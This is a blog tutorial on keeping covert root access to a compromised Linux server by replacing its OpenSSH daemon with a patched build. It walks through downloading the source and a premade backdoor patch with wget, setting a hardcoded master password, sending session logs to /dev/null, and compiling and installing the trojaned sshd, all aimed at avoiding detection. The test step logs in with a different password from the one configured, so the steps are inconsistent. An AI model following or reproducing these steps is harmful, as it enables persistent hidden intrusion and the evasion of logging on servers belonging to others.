Skip navigation

Hello guys ,

In this tutorial i will be talking about some advanced system backdooring ,
i mean after gaining root on a server , many people will create a new root user ,
others will bind a rootshell in a port and come back later on it , those methods work perfectly but they are easilly detected with logs or just by watching openports or /etc/passwd.

Some other people use rootkits which are widely detected by antimalware , or difficult to setup.

In this tutorial i will show you how to make the easiest/undetectable(kinda) backdoor.

What you need :

-A root access to a server
-Knowledge about Linux systems
-Patience and skills

Introduction :

The idea behind is to change openssh binary to let you :

-Login with your custom password
-Leave no logs about your activity

OPENSSH

I will start explaining what is openssh

OpenSSH is a client/server app which allows users to access to the server securely and get a shell session. The
reason behind ‘secure’ is because SSH encrypts its session to forbid sniffers . OpenSSh’s default port is 22 , the latest stable version is 5.9
Openssh is used in the majority of linux servers.
Official URL : http://www.openssh.org

Backdooring :

In this phase I will explain how to ‘hijack’ the authentication method.
We will change the source code to include a master password that will spawn a secure shell
the important files we need to modify are :

# includes.h — Adding our password.
# auth-passwd.c — adding a custom backdoor and implement the password.
# auth-pam.c — In this file we are going to put some code when PAM-authentication is used.
# log.c and loginrec.c — no logs for our user.

in this tutorial i won’t show which code we need to add , but instead we will use a premade patch

Workaround:

1-First we need to know what ssh version is running on the target

# ssh -V
OpenSSh 5.5p1

So in my case i have openssh 5.5p1

2-now i will download this version’s source code from here
http://ftp3.usa.openbsd.org/pub/Open…nSSH/portable/
http://ftp3.usa.openbsd.org/pub/Open…h-5.5p1.tar.gz
3- Now we need to untar the source code :
Code:

# tar zxvf openssh-5.5p1.tar.gz

4- let’s download openssh backdoor patch

# wget http://dl.packetstormsecurity.net/crypt/ssh/openssh/openssh-5.5p1.patch.tar.gz
# tar zxvf openssh-5.5p1.patch.tar.gz
# cp openssh-5.5p1.patch/sshbd5.5p1.diff openssh-5.5p1/

5- let’s modify the patch


# cd openssh-5.5p1/
# nano sshbd5.5p1.diff

notice this lines

+#define ILOG "/tmp/ilog"
+#define OLOG "/tmp/olog"
+#define SECRETPW "apaajaboleh"

I will change them to


+#define ILOG "/dev/null"
+#define OLOG "/dev/null"
+#define SECRETPW "th3breacher"

it means input all logs will be redirected to /dev/null and the secret password is set to th3breacher

6- let’s patch it

# patch < sshbd5.5p1.diff

the patch is applied

7- configuring and installing the new patched openssh daemon

# ./configure --prefix=/usr --sysconfdir=/etc/ssh
# make
# make install && service sshd restart (for Redhat and Cent0S)
# make && make install && service ssh restart (Debian/Ubuntu)

I meant to pipe to commands at a time because while installing the new Daemon the ssh connection will be interrupted and you can’t connect back afterwards , so restarting the service will solve this issue.

8- let’s test it out

Localmachine : # ssh root@targetip
root@targetip password: r00tw0rm

Bingo you are logged in and nothing was logged nor will be logged

#END

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: